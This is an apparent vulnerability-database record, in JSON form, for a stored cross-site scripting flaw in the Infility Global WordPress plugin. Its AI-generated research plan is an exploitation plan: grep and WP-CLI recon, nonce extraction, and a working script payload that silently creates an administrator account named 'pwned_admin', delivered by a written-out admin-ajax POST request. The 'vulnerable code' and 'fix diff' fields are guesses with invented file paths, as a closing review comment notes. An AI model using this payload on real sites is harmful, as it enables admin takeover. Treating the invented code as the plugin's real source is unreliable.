[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFmkXn6zlCQzepEM161sN2L1u58HXw6b_71WCBLCMOjc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-68864","infility-global-unauthenticated-stored-cross-site-scripting","Infility Global \u003C= 2.14.49 - Unauthenticated Stored Cross-Site Scripting","The Infility Global plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.14.49 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","infility-global",null,"\u003C=2.14.49","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-15 00:00:00","2026-01-19 15:55:17",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F58ab78f2-199b-44e8-9213-8c46025b55fb?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to investigate and exploit **CVE-2025-68864**, an unauthenticated stored XSS vulnerability in the **Infility Global** WordPress plugin (\u003C= 2.14.49).\n\n---\n\n### 1. Vulnerability Summary\nThe **Infility Global** plugin fails to sufficiently sanitize user-supplied input and escape it upon output. Specifically, an unauthenticated user can submit data through a frontend feature (likely a contact form, support ticket, or chat registration) that is stored in the database. When a site administrator views this data in the WordPress backend, the malicious script executes in the administrator's browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `ig_contact_form_submit` or `infility_global_save_data`.\n*   **Parameter:** Likely `message`, `subject`, or `name`.\n*   **Authentication:** None (Unauthenticated via `wp_ajax_nopriv_*`).\n*   **Preconditions:** The plugin must have a frontend feature active (e.g., a contact form shortcode placed on a page).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with a specific action registered via `add_action('wp_ajax_nopriv_...', ...)`.\n2.  **Processing:** The callback function receives `$_POST` data. 
It may check a nonce but likely fails to use `sanitize_text_field()` or `wp_kses()` on the content.\n3.  **Persistence:** The raw input is saved to a custom table (e.g., `wp_infility_logs`) or as post meta using `update_post_meta()`.\n4.  **Sink:** An administrator logs in and navigates to the plugin's \"Inquiries\" or \"Messages\" page. The plugin retrieves the stored data and echoes it directly: `echo $entry->message;` without using `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler enforces a nonce check, it is likely exposed via `wp_localize_script` on pages where the plugin's frontend components are active.\n\n1.  **Identify the Shortcode:** Search for shortcode registrations in the plugin:\n    `grep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n    *(Likely shortcode: `[infility_global_contact]`)*\n2.  **Create a Trigger Page:**\n    `wp post create --post_type=page --post_title=\"Contact\" --post_status=publish --post_content='[infility_global_contact]'`\n3.  **Extract the Nonce:**\n    Navigate to the new page and look for localized script data.\n    **JS Variable (Inferred):** `infility_vars` or `ig_ajax_obj`.\n    **Execution:** Use `browser_eval(\"window.infility_vars?.nonce\")` or `browser_eval(\"window.ig_ajax_obj?.ajax_nonce\")`.\n\n### 5. 
Exploitation Strategy\nOnce the nonce and action are identified, the agent will perform the following:\n\n**Step 1: Discovery**\n*   Find the AJAX action: `grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n*   Find the nonce action: `grep -r \"check_ajax_referer\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n\n**Step 2: Nonce Retrieval**\n*   Create a test page with the relevant shortcode.\n*   Navigate to the page using `browser_navigate`.\n*   Extract the nonce using `browser_eval`.\n\n**Step 3: Payload Delivery**\n*   **Payload:** `\u003Cscript>fetch('\u002Fwp-admin\u002Fuser-new.php').then(r=>r.text()).then(t=>{let n=t.match(\u002F_wpnonce_create-user\" value=\"([^\"]+)\"\u002F)[1];fetch('\u002Fwp-admin\u002Fuser-new.php',{method:'POST',headers:{'Content-Type':'application\u002Fx-www-form-urlencoded'},body:'action=createuser&user_login=pwned_admin&email=pwned@example.com&pass1=Pwned123!&pass2=Pwned123!&role=administrator&_wpnonce_create-user='+n})})\u003C\u002Fscript>`\n*   **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=[IDENTIFIED_ACTION]&nonce=[EXTRACTED_NONCE]&message=[URL_ENCODED_PAYLOAD]&name=Guest\n    ```\n\n### 6. Test Data Setup\n1.  **Plugin Activation:** `wp plugin activate infility-global`\n2.  **Shortcode Placement:** Ensure the contact form is on a public page to allow nonce extraction.\n3.  **Admin Context:** A \"victim\" administrator user must exist (default in test environments).\n\n### 7. Expected Results\n*   The AJAX request should return a success status (e.g., `{\"success\":true}` or `1`).\n*   The payload should be stored in the database.\n*   When an administrator views the \"Contact Messages\" or \"Logs\" section of the Infility Global plugin, the script should execute.\n\n### 8. Verification Steps\n1.  
**Database Check:**\n    `wp db query \"SELECT * FROM wp_postmeta WHERE meta_value LIKE '%pwned_admin%';\" `\n    *(Or check the specific plugin table identified during discovery)*.\n2.  **Trigger Execution:** Use `browser_navigate` as an administrator to the plugin's message management page.\n3.  **Account Creation Check:**\n    `wp user list --role=administrator`\n    Verify if `pwned_admin` exists.\n\n### 9. Alternative Approaches\n*   **Action Parameter Variations:** If `wp_ajax_nopriv` isn't used, check for `init` hooks that process `$_POST['ig_contact_submit']` directly.\n*   **Bypassing Nonces:** Check if `check_ajax_referer` is called with `die=false`. If so, the request will proceed even with an invalid nonce.\n*   **DOM XSS:** If the data is returned in an AJAX response and rendered via `.innerHTML` in JS, the payload may need to be adjusted to bypass standard filters (e.g., using `\u003Cimg>` tags with `onerror`).","The Infility Global plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting due to a lack of sanitization on user-supplied form data and insufficient output escaping in the administrative backend. 
This allows attackers to inject malicious JavaScript into contact form submissions or inquiries that execute when a site administrator views the entry.","\u002F\u002F Inferred from research plan: lack of sanitization in AJAX handler\n\u002F\u002F File: includes\u002Fclass-infility-global-ajax.php (or similar)\npublic function ig_contact_form_submit() {\n    $message = $_POST['message']; \u002F\u002F No sanitization applied\n    $name = $_POST['name'];       \u002F\u002F No sanitization applied\n    \n    $post_id = wp_insert_post(array(\n        'post_type' => 'ig_inquiry',\n        'post_title' => $name,\n        'post_content' => $message,\n    ));\n}\n\n---\n\n\u002F\u002F Inferred from research plan: lack of escaping in admin view\n\u002F\u002F File: admin\u002Fclass-infility-global-admin-display.php (or similar)\nforeach ($inquiries as $entry) {\n    echo '\u003Ctr>';\n    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>'; \u002F\u002F Vulnerable: Direct echo without esc_html()\n    echo '\u003C\u002Ftr>';\n}","--- infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n+++ infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n@@ -10,2 +10,2 @@\n-    $message = $_POST['message'];\n-    $name = $_POST['name'];\n+    $message = sanitize_textarea_field($_POST['message']);\n+    $name = sanitize_text_field($_POST['name']);\n\n--- infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n+++ infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n@@ -20,1 +20,1 @@\n-    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($entry->post_content) . '\u003C\u002Ftd>';","1. Identify a page containing the plugin's contact form or shortcode (e.g., [infility_global_contact]).\n2. Extract the AJAX nonce from the localized JavaScript variables (e.g., window.infility_vars.nonce) on the frontend page.\n3. 
Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php using the identified action (likely 'ig_contact_form_submit' or 'infility_global_save_data').\n4. Include a payload in the 'message' or 'name' parameter, such as \u003Cscript>alert(document.cookie)\u003C\u002Fscript> or a script to create a new administrator account.\n5. Wait for an authenticated administrator to navigate to the 'Inquiries' or 'Messages' section of the Infility Global plugin menu in the WordPress dashboard.\n6. The payload will execute in the administrator's browser context upon rendering the list of submissions.","gemini-3-flash-preview","2026-05-05 09:07:39","2026-05-05 09:07:58",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finfility-global\u002Ftags"]
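Review bot: the `research_fix_diff` value is labelled as inferred from the research plan, and its file paths (`includes/class-infility-global-ajax.php`, `admin/class-infility-global-admin-display.php`) and hunk ranges (`@@ -10,2 +10,2 @@`, `@@ -20,1 +20,1 @@`) are speculative rather than taken from a real plugin patch; this record's `patch_diff_files` is empty and `patch_trac_url` is null, so nothing here should be read as the vendor's fix. On the substance, the diff applies `sanitize_textarea_field()` / `sanitize_text_field()` on input and `esc_html()` on output, which is the correct pattern for this class of bug, but it is incomplete against its own vulnerable-code model: the first hunk stores `$name` as `post_title`, while the second hunk only escapes `$entry->post_content` and never shows how the title is rendered. Any fix applied to the real code base should escape every field echoed in the admin table (title, name, message), not just the message column, and verify the handler is registered under the intended `wp_ajax_nopriv_*` action with a `check_ajax_referer()` that dies on failure.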